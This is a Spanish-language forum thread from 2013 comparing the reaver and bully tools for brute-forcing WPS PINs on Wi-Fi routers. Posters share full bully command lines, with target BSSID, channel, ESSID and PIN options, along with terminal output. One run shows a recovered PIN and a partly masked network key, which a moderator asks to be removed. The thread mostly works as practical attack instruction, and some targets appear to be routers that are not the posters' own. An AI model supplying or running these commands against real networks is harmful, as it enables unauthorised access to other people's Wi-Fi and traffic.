Autor Tema: reaver vs bully  (Leído 52518 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Pa_kore

  • Visitante
Re: reaver vs bully
« Respuesta #60 en: 22-08-2013, 17:45 (Jueves) »
buenas a todos e descubierto en el bully una cosa que puse los con mandos estos

bully mon0 -b xx:xx:xx:xx:xx:xx -c x -e nombre de la red -L
los dejo unas imagen que vale mas k mil palabras
a ver si vosotros k entendéis mas y sacáis algo mas un saludos k todos los días los sigo y macéis felices.

 



bully mon0 -b xx:xx:xx:xx:xx:xx -c x -e nombre de la red -L

A mi parecer creo que  la  -L de final sobra no estoy muy seguro pero ese comando ami no me suena

yo lo lanzo bully mon0 -b xx:xx:xx:xx:xx:xx -c x  -e essid y me funciona ;)


« Última modificación: 22-08-2013, 17:50 (Jueves) por Pa_kore »

alist3r

  • Visitante
Re: reaver vs bully
« Respuesta #61 en: 22-08-2013, 17:50 (Jueves) »

carrasco31

  • Visitante
Re: reaver vs bully
« Respuesta #62 en: 22-08-2013, 18:47 (Jueves) »
yo esto lo pobre con una orange bloqueada y me salió esto y empieza como si en buscara clave   

Pa_kore

  • Visitante
Re: reaver vs bully
« Respuesta #63 en: 22-08-2013, 19:26 (Jueves) »
creo que si esta bloqueada no funciona

 Rx  (  M1  )  =  'WPSFAIL'    next   pin   xxxxxxxx

el wps lo tiene desactivado (supongo)

« Última modificación: 22-08-2013, 19:30 (Jueves) por Pa_kore »

alist3r

  • Visitante
Re: reaver vs bully
« Respuesta #64 en: 25-08-2013, 18:20 (Domingo) »
yo esto lo pobre con una orange bloqueada y me salió esto y empieza como si en buscara clave   

si está bloqueada, como su propio nombre indica, no conseguirás nada.

alist3r

  • Visitante
Re: reaver vs bully
« Respuesta #65 en: 25-08-2013, 18:26 (Domingo) »
creo que si esta bloqueada no funciona

 Rx  (  M1  )  =  'WPSFAIL'    next   pin   xxxxxxxx

el wps lo tiene desactivado (supongo)



mirando el código fuente de bully, el hecho de recibir un WPSFAIL es parte del proceso normal de prueba/error en las claves. ah no, recibir eso en el M1 es señal de WPS desactivado

deberias haberlo comprobado con wash, por ejemplo, antes de perder el tiempo asi!
« Última modificación: 25-08-2013, 18:31 (Domingo) por alister »

cristi_28

  • Visitante
Re: reaver vs bully
« Respuesta #66 en: 26-08-2013, 02:08 (Lunes) »
root@JZkVTZIZ:~# bully mon0 -b D0:AE:EC:XX:XX:XX -c 6 -e WLAN_XXXX -S -p 6537070 -v 3
  • Switching interface 'mon0' to channel '6'
  • [!] Using '00:c0:ca:xx:xx:xx' for the source MAC address
  • Datalink type set to '127', radiotap headers present
  • Scanning for beacon from 'd0:ae:ec:xx:xx:xx' on channel '6'
  • Got beacon for 'WLAN_xxxx' (d0:ae:ec:xx:xx:xx)
  • Index of starting pin number is '6537070'
  • Last State = 'NoAssoc'   Next pin '65370704'
  • Pin is '65370704', key is 'xxxxxxxxxxxxxx'
    Saved session to '/root/.bully/d0:ae:ec:xx:xx:xx.run'

       PIN : '65370704'
       KEY : '0QDQXXXXXXXXXXXXX'

    la solucion para poner el pin como en reaver es poner un -S
« Última modificación: 26-08-2013, 02:32 (Lunes) por cristi_28 »

cristi_28

  • Visitante
Re: reaver vs bully
« Respuesta #67 en: 26-08-2013, 02:23 (Lunes) »
y aqui esta puesto para empesar con 45 al principio ;D


root@JZkVTZIZ:~# bully mon0 -b D0:AE:EC:xx:xx:xx -c 6 -e WLAN_xx:xx -S -p 4500000 -v 3
  • Switching interface 'mon0' to channel '6'
  • [!] Using '00:c0:ca:xx:xx:xx:' for the source MAC address
  • Datalink type set to '127', radiotap headers present
  • Scanning for beacon from 'd0:ae:ec:xx:xx:xx' on channel '6'
  • Got beacon for 'WLAN_xxxx' (d0:ae:ec:xx:xx:xx)
  • [!] Restoring session from '/root/.bully/d0:ae:ec:xx:xx:xx:.run'
  • Index of starting pin number is '4500000'
  • Last State = 'NoAssoc'   Next pin '45000003'
  • Rx(  ID  ) = 'EAPFail'   Next pin '45000003'
  • Rx(  M1  ) = 'Timeout'   Next pin '45000003'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '45010002'
  • Rx(  ID  ) = 'EAPFail'   Next pin '45010002'
  • Rx(  M1  ) = 'Timeout'   Next pin '45010002'
  • Rx( Auth ) = 'Timeout'   Next pin '45010002'
  • Sent packet not acknowledged after 3 attempts
  • Tx(  M2  ) = 'Timeout'   Next pin '45010002'
  • Rx(Beacon) = 'Timeout'   Next pin '45010002'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '45020001'
  • Rx(  ID  ) = 'EAPFail'   Next pin '45020001'
  • Rx(  M1  ) = 'Timeout'   Next pin '45020001'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '45030000'

Torpedo

  • Visitante
Re: reaver vs bully
« Respuesta #68 en: 26-08-2013, 02:24 (Lunes) »


No se ponen datos de contraseñas

ni tuyas , ni de los demás

modifico el post anterior

alist3r

  • Visitante
Re: reaver vs bully
« Respuesta #69 en: 26-08-2013, 02:36 (Lunes) »
root@JZkVTZIZ:~# bully mon0 -b D0:AE:EC:XX:XX:XX -c 6 -e WLAN_XXXX -S -p 6537070 -v 3
  • Switching interface 'mon0' to channel '6'
  • [!] Using '00:c0:ca:xx:xx:xx' for the source MAC address
  • Datalink type set to '127', radiotap headers present
  • Scanning for beacon from 'd0:ae:ec:xx:xx:xx' on channel '6'
  • Got beacon for 'WLAN_xxxx' (d0:ae:ec:xx:xx:xx)
  • Index of starting pin number is '6537070'
  • Last State = 'NoAssoc'   Next pin '65370704'
  • Pin is '65370704', key is 'xxxxxxxxxxxxxx'
    Saved session to '/root/.bully/d0:ae:ec:xx:xx:xx.run'

       PIN : '65370704'
       KEY : '0QDQXXXXXXXXXXXXX'

    la solucion para poner el pin como en reaver es poner un -S
que?

te reto a que intentes explicarnos por qué necesitas los pines secuenciales "-S" si ya conoces el pin "-p"

otra cosa es que quieras empezar por 00000045 e ir subiendo. entonces si tiene lógica.

ya os he puesto la lista de opciones de bully antes!
« Última modificación: 26-08-2013, 02:37 (Lunes) por alister »

cristi_28

  • Visitante
Re: reaver vs bully
« Respuesta #70 en: 26-08-2013, 02:38 (Lunes) »
porque si no pones -S se salta el pin intentalo y me diras

cristi_28

  • Visitante
Re: reaver vs bully
« Respuesta #71 en: 26-08-2013, 02:46 (Lunes) »
porque si no pones -S se salta el pin intentalo y me diras

si no mira la respuesta 35

alist3r

  • Visitante
Re: reaver vs bully
« Respuesta #72 en: 26-08-2013, 02:48 (Lunes) »
porque si no pones -S se salta el pin intentalo y me diras

wtf?? has leído las instrucciones?

-p, --pin N            : Index of pin to start at (7 digits) [Auto]

prueba a indicar un pin de 7 dígitos, no un pin de 8 eh...
te lo digo por si acaso.

Luego, sobre el #35... no podéis decir tan alegremente que se salta el pin indicado porque eso es mentira.
que bully, en caso de problemas o error, deberia persistir con el mismo pin en lugar de saltar a otro, perfecto, pero que le falle la asociacion a un usuario cuando iba a probar un pin determinado no quiere decir absolutamente nada, salvo que está lejos del AP

« Última modificación: 26-08-2013, 02:54 (Lunes) por alister »

cristi_28

  • Visitante
Re: reaver vs bully
« Respuesta #73 en: 26-08-2013, 02:59 (Lunes) »
porque si no pones -S se salta el pin intentalo y me diras

wtf?? has leído las instrucciones?

-p, --pin N            : Index of pin to start at (7 digits) [Auto]

prueba a indicar un pin de 7 dígitos, no un pin de 8 eh...
te lo digo por si acaso.



Luego, sobre el #35... no podéis decir tan alegremente que se salta el pin indicado porque eso es mentira.
que bully, en caso de problemas o error, deberia persistir con el mismo pin en lugar de saltar a otro, perfecto, pero que le falle la asociacion a un usuario cuando iba a probar un pin determinado no quiere decir absolutamente nada, salvo que está lejos del AP
 
root@JZkVTZIZ:~# bully mon0 -b D0:AE:EC:DE:AD:F4 -c 6 -e WLAN_ADF4 -p 6537070 -v 3
  • Switching interface 'mon0' to channel '6'
  • [!] Using '00:c0:ca:47:12:45' for the source MAC address
  • Datalink type set to '127', radiotap headers present
  • Scanning for beacon from 'd0:ae:ec:de:ad:f4' on channel '6'
  • Got beacon for 'WLAN_ADF4' (d0:ae:ec:de:ad:f4)
  • Loading randomized pins from '/root/.bully/pins'
  • Index of starting pin number is '6537070'
  • Last State = 'NoAssoc'   Next pin '11557470'
  • Rx(  M1  ) = 'Timeout'   Next pin '11557470'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '59557470'
  • Sent packet not acknowledged after 3 attempts
  • Tx( Strt ) = 'Timeout'   Next pin '59557470'
  • Rx(Beacon) = 'Timeout'   Next pin '59557470'
  • Sent packet not acknowledged after 3 attempts
  • Tx(DeAuth) = 'Timeout'   Next pin '59557470'
  • Rx(Beacon) = 'Timeout'   Next pin '59557470'

^C
aqui tienes tu respuesta o prueba como quieres sin -S es el mismo AP


alist3r

  • Visitante
Re: reaver vs bully
« Respuesta #74 en: 26-08-2013, 04:17 (Lunes) »
porque si no pones -S se salta el pin intentalo y me diras

wtf?? has leído las instrucciones?

-p, --pin N            : Index of pin to start at (7 digits) [Auto]

prueba a indicar un pin de 7 dígitos, no un pin de 8 eh...
te lo digo por si acaso.



Luego, sobre el #35... no podéis decir tan alegremente que se salta el pin indicado porque eso es mentira.
que bully, en caso de problemas o error, deberia persistir con el mismo pin en lugar de saltar a otro, perfecto, pero que le falle la asociacion a un usuario cuando iba a probar un pin determinado no quiere decir absolutamente nada, salvo que está lejos del AP
 
root@JZkVTZIZ:~# bully mon0 -b D0:AE:EC:DE:AD:F4 -c 6 -e WLAN_ADF4 -p 6537070 -v 3
  • Switching interface 'mon0' to channel '6'
  • [!] Using '00:c0:ca:47:12:45' for the source MAC address
  • Datalink type set to '127', radiotap headers present
  • Scanning for beacon from 'd0:ae:ec:de:ad:f4' on channel '6'
  • Got beacon for 'WLAN_ADF4' (d0:ae:ec:de:ad:f4)
  • Loading randomized pins from '/root/.bully/pins'
  • Index of starting pin number is '6537070'
  • Last State = 'NoAssoc'   Next pin '11557470'
  • Rx(  M1  ) = 'Timeout'   Next pin '11557470'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '59557470'
  • Sent packet not acknowledged after 3 attempts
  • Tx( Strt ) = 'Timeout'   Next pin '59557470'
  • Rx(Beacon) = 'Timeout'   Next pin '59557470'
  • Sent packet not acknowledged after 3 attempts
  • Tx(DeAuth) = 'Timeout'   Next pin '59557470'
  • Rx(Beacon) = 'Timeout'   Next pin '59557470'

^C
aqui tienes tu respuesta o prueba como quieres sin -S es el mismo AP


Prueba 1



Prueba 2


cristi_28

  • Visitante
Re: reaver vs bully
« Respuesta #75 en: 26-08-2013, 09:45 (Lunes) »
no veo la clave en ninguno ;D porque no has hecho el 3 ej con -S por curiosidad
« Última modificación: 26-08-2013, 09:46 (Lunes) por cristi_28 »

alist3r

  • Visitante
Re: reaver vs bully
« Respuesta #76 en: 26-08-2013, 10:01 (Lunes) »
no veo la clave en ninguno ;D porque no has hecho el 3 ej con -S por curiosidad

te aclaro que solo tenía que demostrar que bully puede atacar correctamente el pin que le indicas con -p , sin usar -S, cosa que queda comprobada en ambas capturas. Y en caso de fallar en intento, persiste con el mismo pin, cosa que tambien queda demostrada en ambas capturas.
Utilizando -S el comportamientoo es identico.

De todos modos gracias al hecho de que hemos estado chinchandonos con este tema :D he detectado un pequeño bug en bully a la hora de inicializarse, que puede llevar a la situación que comentas.

Ya he hablado con Brian para que le echemos un vistazo y tratemos de resolverlo.
« Última modificación: 26-08-2013, 10:09 (Lunes) por alister »

cristi_28

  • Visitante
Re: reaver vs bully
« Respuesta #77 en: 26-08-2013, 10:20 (Lunes) »
me alegro por tu descubrimiento del bug pero a mi lo que mas me estraña es porque con la opcion -S me da la clave si sin la opcion -S  no me da la clave y e eho mas de una pruba con varios AP y el resultado es igual

alist3r

  • Visitante
Re: reaver vs bully
« Respuesta #78 en: 26-08-2013, 10:32 (Lunes) »
me alegro por tu descubrimiento del bug pero a mi lo que mas me estraña es porque con la opcion -S me da la clave si sin la opcion -S  no me da la clave y e eho mas de una pruba con varios AP y el resultado es igual

porque a ti te está randomizando los pines antes de empezar a atacar el pin seleccionado.

por tanto la consecuencia es lógica, si no esta probando el pin correcto, logicamente no te da la clave.

cristi_28

  • Visitante
Re: reaver vs bully
« Respuesta #79 en: 26-08-2013, 10:44 (Lunes) »
pues eso intentaba decirte desde el primer post  :D :D :D porque por los mensajes que he visto la gente pone el pin i no les da la clave y pensaba que esta bien saver que con esta opcion si de da la clave ....gracias por tu atencion  ;D ;D ;D